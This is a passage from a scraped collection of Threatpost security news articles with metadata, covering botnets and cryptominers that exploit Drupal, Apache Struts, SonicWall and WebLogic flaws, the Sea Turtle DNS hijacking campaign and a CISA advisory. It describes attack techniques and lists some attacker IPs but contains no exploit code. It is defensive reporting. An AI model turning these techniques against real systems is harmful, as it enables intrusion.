exploits.\n\nNow Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug. They said multiple scans on infected Drupal instances reveal[ attackers](<https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/>) are exploiting the vulnerability by accessing a URL and then injecting exploit code. The technique allows adversaries to execute commands on targeted servers running Drupal.\n\nThe Muhstik botnet exploits Drupal vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)), impacting versions 6,7, and 8 of Drupal\u2019s CMS platform. \u201cThis potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,\u201d warned MITRE\u2019s Common Vulnerabilities and Exposures bulletin on March 28.\n\nDrupal, which also released a patch for the vulnerability in [March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), warned that over one million sites running Drupal are impacted. Unprivileged and untrusted attackers could also modify or delete data hosted on affected CMS platforms, Drupal said.\n\nAfter further investigations, Netlab researchers said that it believes at least three groups of malware were exploiting the vulnerability.\n\n\u201cWe noticed one of them has worm-propagation behavior. After investigation, we believe this botnet has been active for quit a time. We name it Muhstik, for this keyword keeps popup in its binary file name and the communication IRC channel,\u201d wrote Netlab 360 researchers.\n\nAccording to Netlab, Muhstik is a variant of Tsunami, a malware strain that creates botnets with infected Linux servers and Linux-based IoT devices.\n\nMuhstik has the capability to install two coinminers \u2013 XMRig (XMR) and CGMiner \u2013 to mine the open-source, peer-to-peer Dash cryptocurrency, according to Netlab.\n\nResearchers say the botnet uses the open-source XMRig utility to mine cryptocurrency with a self-built mining pool (47.135.208.145:4871). Meanwhile, it uses popular mining software CGMiner to to dig cryptocurrency coins using multiple mining tools (with username reborn.D3), they said.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2018/04/23162156/Botnet.png>)\n\nIn addition Netlab researchers said they intercepted multiple DDoS attack instructions targeting the IP address 46[.]243[.]189[.]102.\n\nMuhstik relies on 11 command and control domains and IP addresses, and the attackers also uses the IRC communication protocol to invoke commands for the botnet: \u201cWe observed multiple IRC Channels, all starting with \u2018muhstik,'\u201dsaid Netlab researchers in a report. \u201cAt present, we can not confirm which specific channels are open on which C2 server. This is due to the characteristics of the IRC protocol itself. Only when we receive a communication instruction from the corresponding channel can we confirm it\u2019s present.\u201d\n\nMuhdtik also has capabilities to scan for vulnerable server apps using the the aiox86 scanning module. This module \u201cscans TCP port 80, 8080, 7001, 2004, and tries varieties of different payloads on each port,\u201d according to NetLab.\n\nGreyNoise Intelligence said in a tweet that it detected the botnet to be exploiting a vulnerability (CVE-2017-10271) in Oracle WebLogic Server as well, indicating that Muhstik is exploiting vulnerabilities in other server applications.\n\n> UPDATE: there is a 95% overlap between the IPs scanning for the previously reported [#drupalgeddon](<https://twitter.com/hashtag/drupalgeddon?src=hash&ref_src=twsrc%5Etfw>) vulnerability and the Oracle CVE-2017-10271 vulnerability.\n> \n> \u2014 GreyNoise Intelligence (@GreyNoiseIO) [April 18, 2018](<https://twitter.com/GreyNoiseIO/status/986458691787517952?ref_src=twsrc%5Etfw>)\n\nTroy Mursch, founder of Bad Packets Report, told Threatpost that given the criticality of the exploit and the repurcussions once it\u2019s used, \u201cthe race is on to find vulnerable Drupal installations.\u201d\n\n\u201cI recommend affected users update to Drupal 7.58 or 8.5.1 as soon as possible. To note as well, updating to the patched version doesn\u2019t retroactively \u2018unhack\u2019 your site. I recommend website operators check their installation (server) for any of the IoCs mentioned in the 360 Netlab report after completing the update,\u201d he said.\n", "cvss3": {}, "published": "2018-04-23T22:13:25", "type": "threatpost", "title": "Muhstik Botnet Exploits Highly Critical Drupal Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-10271", "CVE-2018-7600"], "modified": "2018-04-23T22:13:25", "id": "THREATPOST:5633BBF7C54D598EB76A7B3781EFD2CB", "href": "https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-07-03T05:58:59", "description": "It was only a matter of time before attacks were seen in the wild, and now it\u2019s happened. A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.\n\nCroniX also a competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.\n\n\u201cFor some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources,\u201d F5 researchers said. \u201cThis is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system.\u201d\n\nComparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.\n\n\u201cThe malware deployment pattern\u2026similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one,\u201d researchers noted in the analysis.\n\nOne difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files. Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names designating the Pacific island of Palau (.pw) \u2013 believed registered by a Russian registrant.\n\nWhile cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.\n\n\u201cApache Struts is used by some of the world\u2019s largest companies,\u201d she said via email. \u201cThe more common the vulnerability, the more it helps attackers simplify their process\u2026and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There\u2019s no time to waste.\u201d\n\nMore attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft\u2019s OS.\n\n\u201c[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a Powershell command on a targeted victim,\u201d researchers said. \u201cSo, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server.\u201d\n", "cvss3": {}, "published": "2018-09-05T17:48:03", "type": "threatpost", "title": "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-1000353", "CVE-2017-5638", "CVE-2018-11776"], "modified": "2018-09-05T17:48:03", "id": "THREATPOST:D70CED5C745CA3779F2D02FBB6DBA717", "href": "https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-03-24T11:42:41", "description": "A newly-discovered state-sponsored campaign is targeting national security organizations across the Middle East and North Africa (MENA) \u2013 and elsewhere \u2013 with domain name system (DNS) hijacking attacks, used to scoop up credentials.\n\nThe campaign, dubbed \u201cSea Turtle\u201d by the Cisco Talos researchers who discovered it, began as early as January 2017 and has continued through the first quarter of 2019.\n\nAt least 40 different organizations across 13 various countries have been compromised so far by the campaign; in addition to the MENA victims, secondary targets, including telecom firms, ISPs and DNS registrars are being targeted in the U.S. and Sweden.\n\nResearchers in a [Wednesday analysis](<https://blog.talosintelligence.com/2019/04/seaturtle.html>) said that the attackers behind the campaign have the capabilities and sophistication to grow: \u201cWhile this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system,\u201d they said.\n\n## The Campaign\n\nThe campaigns have been utilizing DNS hijacking attacks, a type of attack where an individual redirects traffic meant to go to a legitimate website to a malicious server \u2014 meaning that they could easily harvest website credentials and other sensitive data that users are sharing with web forms and the like.\n\nSince 2017, more than 40 firms have been compromised by the Sea Turtle attacks \u2013 including national security organizations, ministries of foreign affairs and prominent energy organizations; and telecom firms, internet service providers (ISPs) and DNS registrars. That includes companies like consulting firm [Cafax](<http://www.cafax.se/Home.html>) and DNS registry [NetNod,](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) which have both released public statements on the attacks.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123213/image1.jpg>)\n\nIn addition to these types of targets, researchers said the campaign represents the first known case of a domain name registry organization that was compromised for cyber-espionage operations. A domain name registry manages different parts of the domain registry, such as country code top-level domains and generic top-level domains. Compromising a domain name registry allows attackers to access the DNS logs, and highlights the sophistication of the attackers, researchers said.\n\nThe campaign has been \u201chighly successful,\u201d researchers said, in part because the attacker employed DNS hijacking and redirection attacks to access targeted networks, as traditional security products aren\u2019t designed to monitor DNS requests, said researchers: \u201cThe threat actors were able to achieve this level of success because the DNS domain space system added security into the equation as an afterthought,\u201d researchers said.\n\n## The Attacks\n\nThe attackers gained initial access either through spear-phishing emails or through exploiting known flaws.\n\nThe phishing emails were aimed at registrants and used to gain their credentials. From there, the bad actors could access an organization\u2019s DNS records with the registrant\u2019s credentials.\n\nor by exploiting known vulnerabilities \u2013 including a PHP code injection flaw in phpMyAdmin (CVE-2009-1151), a remote code exploit for Cisco integrated service router 2811 (CVE-2017-6736) and the infamous \u201cDrupalgeddon\u201d remote code execution Drupal glitch (CVE-2018-7600).\n\nA list of impacted CVEs used by the attacker is below \u2013 but researchers say that they believe the list is incomplete and \u201cthe actor in question can leverage known vulnerabilities as they encounter a new threat surface.\u201d\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123327/Screen-Shot-2019-04-17-at-12.03.19-PM.png>)\n\nOnce they gained access to a network, an attacker would access the DNS registry and modify the name system records for targeted firms, pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries \u2013 allowing them to trick users to give them their credentials.\n\n\u201cThe amount of time that the targeted DNS record was hijacked can range from a couple of minutes to a couple of days,\u201d researchers said. \u201cThis type of activity could give an attacker the ability to redirect any victim who queried for that particular domain around the world.\u201d\n\nThe threat actors also used an array of techniques to evade detection, researchers said.\n\nFor instance, once users put their credentials into impersonated services, they would then be passed to the legitimate service, and couldn\u2019t tell that anything was wrong.\n\nAttackers also used an interesting technique called certificate impersonation, where attackers stole a certificate authority-signed X.509 certificate from another provider for the same domain, imitating the one already used by the targeted organization \u2013 making the web browser seem more legitimate.\n\n## Other Campaigns\n\nResearchers said that they assess with high confidence that the hijacking attacks are being launched by an advanced, state-sponsored actor looking to access sensitive networks and systems \u2013 but stayed mum on who exactly that actor was.\n\n\u201cThis is the first time Cisco Talos is documenting operations conducted by this threat actor,\u201d Craig Williams, director of Talos Outreach at Cisco, told Threatpost. \u201cWhile we assess with high confidence that this activity was carried out by an advanced, state-sponsored actor, we defer to law enforcement officials on establishing attribution.\u201d\n\nDNS-based attacks are an increasing worry for governments and enterprises alike.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123429/image3.png>)\n\nDNS Hijack Attack Vector\n\n[In January,](<https://threatpost.com/gov-warning-dns-hijacking/141088/>) the Department of Homeland Security is ordering all federal agencies to urgently audit DNS security for their domains in the next 10 business days.\n\nAlso [in January](<https://threatpost.com/unprecedented-dns-hijacking-attacks-linked-to-iran/140737/>), a wave of DNS hijacking attacks targeting victims in North America, Europe, Middle East and North Africa were linked to Iran. The attacks, which were related to a campaign dubbed \u201cDNSpionage\u201d by Cisco Talos researchers, had a high degree of success harvesting targets\u2019 credentials, according to the firm.\n\nHowever, Talos researchers said they assess with high confidence that the DNSpionage operations are \u201cdistinctly different and independent\u201d from the Sea Turtle campaign.\n\n\u201cThe report assesses with high confidence that Sea Turtle operations are distinctly different and independent from DNSpionage operations,\u201d Williams told Threatpost. \u201cDNSpionage and Sea Turtle have a strong correlation in that they both use the DNS hijacking/re-direction methodologies to perform their attacks. However, both campaigns\u2019 level of maturity and capability are distinctly different. Sea Turtle has a much more mature level of playbook by attacking their ancillary targets before shifting their focus to a specific set of Middle Eastern and African victims. Due to the closely related nature of the attacks, overlapping TTPs [tactics, techniques and procedures] are common, but our visibility makes it very clear these are two different groups.\u201d\n\nTo protect against these DNS hijacking attacks, Williams said that companies can implement a registry lock service, multi-factor authentication (to access DNS records), and of course staying up to date on patches, especially on internet-facing machines.\n\nHowever, \u201conce these credentials are stolen, it is virtually impossible to completely shut down a campaign until the credentials are regained, changed and locked,\u201d he told Threatpost.\n\n**_Don\u2019t miss our free _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/8845482382938181378?source=ART>)**_, \u201cData Security in the Cloud,\u201d on April 24 at 2 p.m. ET._**\n\n**_A panel of experts will join Threatpost senior editor Tara Seals to discuss _****_how to lock down data when the traditional network perimeter is no longer in place. They will discuss how the adoption of cloud services presents new security challenges, including ideas and best practices for locking down this new architecture; whether managed or in-house security is the way to go; and ancillary dimensions, like SD-WAN and IaaS._**\n", "cvss3": {}, "published": "2019-04-17T17:32:06", "type": "threatpost", "title": "State-Sponsored DNS Hijacking Infiltrates 40 Firms Globally", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2009-1151", "CVE-2017-6736", "CVE-2018-7600", "CVE-2020-1938"], "modified": "2019-04-17T17:32:06", "id": "THREATPOST:4397A021D669D8AF15AA58DF915F8BB6", "href": "https://threatpost.com/dns-hijacking-campaign-40-firms-globally/143870/", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2019-05-30T05:51:10", "description": "Researchers have discovered new variants for the infamous Mirai and Gafgyt IoT botnets \u2013 now targeting well-known vulnerabilities in Apache Struts and SonicWall.\n\nThe new Mirai strain targets the Apache Struts flaw associated with the 2017 Equifax breach, while the Gafgyt variant uses a newly-disclosed glitch impacting older, unsupported versions of SonicWall\u2019s Global Management System, according to researchers with Palo Alto Networks in a [Sunday ](<https://researchcenter.paloaltonetworks.com/2018/09/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/>)post.\n\n\u201cHere we\u2019re seeing Mirai and Gafgyt variants targeting systems mostly seen in enterprises,\u201d Ruchna Nigam, researcher with Palo Alto Networks, told Threatpost. \u201cUltimately, future trends are open to speculation, but we know that targeting enterprise links offers bigger bandwidth from a DDoS perspective. For now, it looks that the attackers may be doing a test run on the efficacy of using different vulnerabilities, with the intention of spotting ones that herd the maximum number of bots, affording them greater firepower for a DDoS.\u201d\n\n**Mirai Evolves**\n\nResearchers said that they discovered samples of a Mirai variant on Sept. 7 incorporating exploits that targeted 16 separate vulnerabilities.\n\nThe variant notably exploits the critical arbitrary command-execution flaw in Apache Struts ([CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>)) that was patched in March 2017. This marks the first known instance of Mirai targeting a vulnerability in Apache Struts, researchers said. Attackers could use specially crafted content-type, content-disposition or content-length HTTP headers to launch an arbitrary command-execution attack.\n\nThough a patch has been available for over a year now, many consumers may not have updated their systems \u2013 an issue that led to the already-patched [vulnerability](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>) being responsible for the Equifax breach last summer that impacted 147 million consumers.\n\nFlaws in Apache Struts have been actively exploited in the wild in other recent campaigns; these include a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution (CVE-2018-11776) [vulnerability](<https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>), which was patched in August.\n\nThe other 15 vulnerabilities targeted by the newest Mirai strain have been incorporated into the botnet in the past, including a Linksys remote code-execution flaw in Linksys E-Series devices, a Vacron NVR remote code-execution glitch, a remote code-execution issue in D-Link devices, remote code-execution vulnerabilities in CCTVs and DVRs from up to 70 vendors, and a flaw (CVE-2017-6884) in Zyxel routers.\n\nUnit 42 also found that the domain currently hosting these Mirai samples previously resolved to a different IP address during the month of August \u2014 an IP address hosting a new version of Gafgyt as well.\n\n**Gafgyt Adds to Bag of Tricks**\n\nIn August, the observed IP was \u201cintermittently hosting samples of Gafgyt that incorporated an exploit against CVE-2018-9866, a SonicWall vulnerability affecting older versions of SonicWall Global Management System (GMS),\u201d according to Nigam.\n\nThe targeted vulnerability ([CVE-2018-9866](<https://nvd.nist.gov/vuln/detail/CVE-2018-9866>)) exists in the lack of validation of user-supplied parameters pass to XML-RPC calls on SonicWall Global Management System (GMS) virtual appliances, allowing remote users to execute arbitrary code.\n\nThis vulnerability affects older, unsupported GMS versions, including 8.1 and earlier (the flaw is not present in supported versions). A Metasploit module was first [published](<https://www.exploit-db.com/exploits/45124/>) earlier this summer for the flaw; SonicWall then published a [public advisory](<https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2018-0007>) about the critical issue July 17.\n\nSonicWall has been notified of this latest development with Gafgyt, researchers said.\n\n\u201cThe vulnerability disclosed in this post is not an announcement of a new vulnerability in SonicWall GMS,\u201d a SonicWall spokesperson told Threatpost. \u201cThe issue referenced only affects an older version of the GMS software (version 8.1) which was replaced by version 8.2 in December 2016. Customers and partners running GMS version 8.2 and above are protected against this vulnerability. Customers still using GMS version 8.1 should apply a hotfix supplied by SonicWall in August 2018 and plan for an immediate upgrade, as GMS 8.1 went out of support in February 2018.\u201d\n\nThe Gafgyt botnet exploits a range of IoT flaws, including other issues in Huawei, GPON and D-Link devices.\n\nOnce in, it then fetches an update from &lt;HTTP_SERVER&gt;, saves it to &lt;FILE_LOCATION&gt;, and installs the update. After that, the botnet launches a Blacknurse DDoS attack, an attack that involves ICMP Type 3 Code 3 packets causing high CPU loads first discovered in November 2016.\n\n\u201cOne thing that stood out was the Gafgyt variant having support for the BlackNurse DDoS attack method,\u201d Ruchna told us. \u201cThe earliest samples I have seen supporting this DDoS method are from September 2017.\u201d\n\n**Continued Development**\n\nThe discovery of new targeted vuln comes after it was revealed in July that Mirai and Gafgyt were actively launching two IoT/Linux botnet [campaigns](<https://threatpost.com/d-link-dasan-routers-under-attack-in-yet-another-assault/134255/>), exploiting the [CVE-2018-10562 and CVE-2018-10561 bugs in Dasan routers](<https://threatpost.com/millions-of-home-fiber-routers-vulnerable-to-complete-takeover/131593/>).\n\nIn October 2016, the world was introduced to Mirai when it [overwhelmed servers](<https://threatpost.com/dyn-ddos-could-have-topped-1-tbps/121609/>) at global domain provider Dynamic Network Services (Dyn); that led to the blockage of more than 1,200 websites, including Netflix and Twitter. The Mirai source code was then released in Oct. 2016, with Mirai variants continuing to pop up left and right since then.\n\nMost recently, in April, a variant of the Mirai [botnet](<https://threatpost.com/mirai-variant-targets-financial-sector-with-iot-ddos-attacks/131056/>) was used to launch a series of DDoS campaigns against financial sector businesses, while in January, researchers identified a variant called [Satori (Mirai Okiru)](<https://threatpost.com/satori-author-linked-to-new-mirai-variant-masuta/129640/>).\n", "cvss3": {}, "published": "2018-09-10T14:23:09", "type": "threatpost", "title": "Mirai, Gafgyt Botnets Return to Target Infamous Apache Struts, SonicWall Flaws", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-6884", "CVE-2018-10561", "CVE-2018-10562", "CVE-2018-11776", "CVE-2018-9866"], "modified": "2018-09-10T14:23:09", "id": "THREATPOST:FC5665486C9D63E5C0C242F47F66ACF1", "href": "https://threatpost.com/mirai-gafgyt-botnets-return-to-target-infamous-apache-struts-sonicwall-flaws/137309/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-10-14T22:23:27", "description": "A new version of a known malware campaign aimed at installing cryptominers has changed up its tactics, adding attacks on Windows servers and a new pool of exploits to its bag of tricks. It is also swiftly evolving to position itself as a backdoor for downloading future, more damaging malware, researchers said.\n\nThe malware itself was first uncovered about a year ago, and is a loader that spreads as a worm, searching and infecting other vulnerable machines. Once it infects a machine, it fetches the XMRig cryptomining payload, which mines for Monero.\n\nAccording to [an analysis](<https://blog.barracuda.com/2020/06/25/threat-spotlight-new-cryptominer-malware-variant/>) from Barracuda Networks released Thursday, the heretofore unnamed loader, which it now calls \u201cGolang,\u201d originally targeted only Linux machines, but now has spread to Windows and other servers.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cThis new malware variant attacks web application frameworks, application servers and non-HTTP services such as Redis and MSSQL,\u201d explained the researchers. They added, \u201cWhile the volume is still low because the variant is so new, Barracuda researchers have seen only seven source IP addresses linked to this malware variant so far, and they are all based in China.\u201d\n\nThe bad code also uses various older vulnerability exploits in order to achieve the initial compromise of a targeted machine. The new version includes: CVE-2017-10271 for Oracle WebLogic; CVE-2015-1427 and CVE-2014-3120 for ElasticSearch; [CVE-2018-7600 for Drupal](<https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/>), a.k.a. \u201c[Drupalgeddon 2.0](<https://threatpost.com/new-drupalgeddon-attacks-enlist-shellbot-to-open-backdoors/138230/>)\u201c; and CVE-2018-20062 for the ThinkPHP framework.\n\nOther exploits that don\u2019t have CVEs are also used to exploit Hadoop, Redis and MSSQL. In the latter two cases, the malware will first try to mount a dictionary/brute-forcing attack to find credentials, and, if successful, it will use a known method for achieving remote code-execution \u201cby dumping the db file into cron path,\u201d according to Barracuda.\n\n\u201cSome of the exploits the malware includes are targeting the ThinkPHP web application framework, which is popular in China,\u201d according to the report. \u201cAs in other families of malwares, it is safe to assume that this malware will keep evolving, employing more and more exploits.\u201d\n\n## **A Golang Malware**\n\nNotably, the malware is written in the Go language (Golang).\n\nGolang is a 10-year-old compiled programming language designed by Google. According to F5 Networks, [which discovered](<https://www.f5.com/labs/articles/threat-intelligence/new-golang-malware-is-spreading-via-multiple-exploits-to-mine-mo>) the first iteration of the malware last summer, applications written in Go tend to be bulkier than others as the functions imported from other libraries are compiled in the binary itself. It also has a unique way of calling functions and storing symbols and data.\n\n\u201cAlthough the language is about 10 years old, and is used by many legitimate programmers, there has not been as much activity with Golang malware,\u201d according to F5. That said, in April, another wormable Golang loader known as Kinsing [was spotted](<https://threatpost.com/self-propagating-malware-docker-ports/154453/>) dropping XMRig onto Docker instances.\n\n## **Under the Hood**\n\nOnce the malware infects a machine, it downloads a set of files that are customized based on the platform it is attacking. One of those files positions the malware for doing more damage than simply installing a cryptominer.\n\nThe file sets typically include the initial loader pacyload, an update script, a cryptominer and its configuration file, a watchdog, a scanner and a config file for the cryptominer, Barracuda noted.\n\nOut of these files, the watchdog makes sure that the scanner and miner are up and running and that all components are up to date.\n\n\u201cIf it fails to connect to the command-and-control server (C2), it will try to fetch the address of a new server by parsing transactions on a specific Ethereum account,\u201d explained the researchers.\n\nThe scanner file meanwhile is the malware\u2019s worm propagation mechanism. It automatically scans the internet for vulnerable machines by generating random IP addresses and trying to attack the machines behind them. Once it infects a target, it reports back to the C2 about the success.\n\nFor Windows machines, the malware also adds a backdoor user, researchers found \u2013 essentially just adding another user to the system. An init/update script accomplishes this on the Linux side, according to the analysis, by adding authorized SSH key to the system.\n\n\u201cAlthough the malware includes components which constantly check for updates and help persist the attack, the installed backdoor user grants another level of control to the operators,\u201d Erez Turjeman, senior software engineer and a security researcher for Barracuda Labs, told Theatpost. \u201cThis can be used for deploying additional attacks on the victim\u2019s machine and network, beyond the scope of cryptomining.\u201d\n\nHe added, \u201cThe cryptomining component in this malware can be easily replaced by the operators into some other functionality, meaning that we might see other variants used for other purposes in the future.\u201d\n\n**_BEC and enterprise email fraud is surging, but DMARC can help \u2013 if it\u2019s done right. On July 15 at 2 p.m. ET, join Valimail Global Technical Director Steve Whittle and Threatpost for a [FREE webinar](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>), \u201cDMARC: 7 Common Business Email Mistakes.\u201d This technical \u201cbest practices\u201d session will cover constructing, configuring, and managing email authentication protocols to ensure your organization is protected. [Click here to register](<https://attendee.gotowebinar.com/register/441045308082589963?source=art>) for this Threatpost webinar, sponsored by Valimail._**\n", "cvss3": {}, "published": "2020-06-25T18:30:59", "type": "threatpost", "title": "Golang Worm Widens Scope to Windows, Adds Payload Capacity", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2014-3120", "CVE-2015-1427", "CVE-2017-10271", "CVE-2018-20062", "CVE-2018-7600", "CVE-2020-5135"], "modified": "2020-06-25T18:30:59", "id": "THREATPOST:9530BF61FA72CF3E2B226C171BB8C5E7", "href": "https://threatpost.com/worm-golang-malware-windows-payloads/156924/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-30T09:53:38", "description": "In a perfect world, CISA would laminate cards with the year\u2019s top 30 vulnerabilities: You could whip it out and ask a business if they\u2019ve bandaged these specific wounds before you hand over your cash.\n\nThis is not a perfect world. There are no laminated vulnerability cards.\n\nBut at least we have the list: In a joint advisory ([PDF](<https://us-cert.cisa.gov/sites/default/files/publications/AA21-209A_Joint%20CSA_Top%20Routinely%20Exploited%20Vulnerabilities.pdf>)) published Wednesday, the FBI and Cybersecurity and Infrastructure Security Agency (CISA), the Australian Cyber Security Center, and the UK\u2019s National Cyber Security Center listed the vulnerabilities that were \u201croutinely\u201d exploited in 2020, as well as those that are most often being picked apart so far this year.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nThe vulnerabilities \u2013 which lurk in devices or software from the likes of Citrix, Fortinet, Pulse Secure, Microsoft and Atlassian \u2013 include publicly known bugs, some of which are growing hair. One, in fact, dates to 2000.\n\n\u201cCyber actors continue to exploit publicly known \u2013 and often dated \u2013 software vulnerabilities against broad target sets, including public and private sector organizations worldwide,\u201d according to the advisory. \u201cHowever, entities worldwide can mitigate the vulnerabilities listed in this report by applying the available patches to their systems and implementing a centralized patch management system.\u201d\n\nSo far this year, cyberattackers are continuing to target vulnerabilities in perimeter-type devices, with particularly high amounts of unwanted attention being devoted to flaws in the perimeter devices sold by Microsoft, Pulse, Accellion, VMware and Fortinet.\n\nAll of the vulnerabilities have received patches from vendors. That doesn\u2019t mean those patches have been applied, of course.\n\n## Repent, O Ye Patch Sinners\n\nAccording to the advisory, attackers are unlikely to stop coming after geriatric vulnerabilities, including CVE-2017-11882: a Microsoft Office remote code execution (RCE) bug that was already near drinking age when it was [patched at the age of 17](<https://threatpost.com/microsoft-patches-17-year-old-office-bug/128904/>) in 2017.\n\nWhy would they stop? As long as systems remain unpatched, it\u2019s a win-win for adversaries, the joint advisory pointed out, as it saves bad actors time and effort.\n\n> Adversaries\u2019 use of known vulnerabilities complicates attribution, reduces costs, and minimizes risk because they are not investing in developing a zero-day exploit for their exclusive use, which they risk losing if it becomes known. \u2014Advisory\n\nIn fact, the top four preyed-upon 2020 vulnerabilities were discovered between 2018 to 2020, showing how common it is for organizations using the devices or technology in question to sidestep patching or remediation.\n\nThe top four:\n\n * [CVE-2019-19781](<https://threatpost.com/critical-citrix-rce-flaw-corporate-lans/152677/>), a critical bug in the Citrix Application Delivery Controller (ADC) and 